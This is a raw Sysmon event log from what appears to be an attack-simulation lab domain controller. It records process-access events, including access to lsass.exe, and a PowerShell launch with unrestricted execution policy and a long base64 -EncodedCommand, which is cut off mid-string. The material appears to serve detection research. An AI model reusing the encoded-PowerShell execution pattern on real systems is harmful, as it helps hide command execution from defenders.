15:53:04.536{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005739Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.536{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7CE0-5FA1-3301-000000008801}4560C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005738Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.536{D28789B6-7CDE-5FA1-2301-000000008801}35642604C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{D28789B6-7CE0-5FA1-3301-000000008801}4560C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+181c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005737Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.539{D28789B6-7CE0-5FA1-3301-000000008801}4560C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-regex --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{D28789B6-7CDE-5FA1-2301-000000008801}3564C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 11241100x80000000000000005736Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.536{D28789B6-7CE0-5FA1-3201-000000008801}3740C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_jj4mnafx.vyg.ps12020-11-03 15:53:04.536 10341000x80000000000000005735Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.520{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7CE0-5FA1-3201-000000008801}3740C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005734Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.489{D28789B6-7CE0-5FA1-3001-000000008801}47404528C:\Windows\system32\conhost.exe{D28789B6-7CE0-5FA1-3201-000000008801}3740C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005733Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.489{D28789B6-7C62-5FA1-0B00-000000008801}8684780C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005732Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.489{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005731Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.489{D28789B6-7C62-5FA1-0B00-000000008801}8684780C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005730Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.489{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005729Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.489{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005728Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.489{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005727Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.489{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005726Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.489{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005725Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.489{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005724Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.489{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005723Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.489{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005722Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.489{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CE0-5FA1-3201-000000008801}3740C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005721Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.489{D28789B6-7CE0-5FA1-3101-000000008801}42405068C:\Windows\system32\cmd.exe{D28789B6-7CE0-5FA1-3201-000000008801}3740C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005720Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.498{D28789B6-7CE0-5FA1-3201-000000008801}3740C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CE0-5FA1-AF9E-0B0000000000}0xb9eaf0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7CE0-5FA1-3101-000000008801}4240C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAE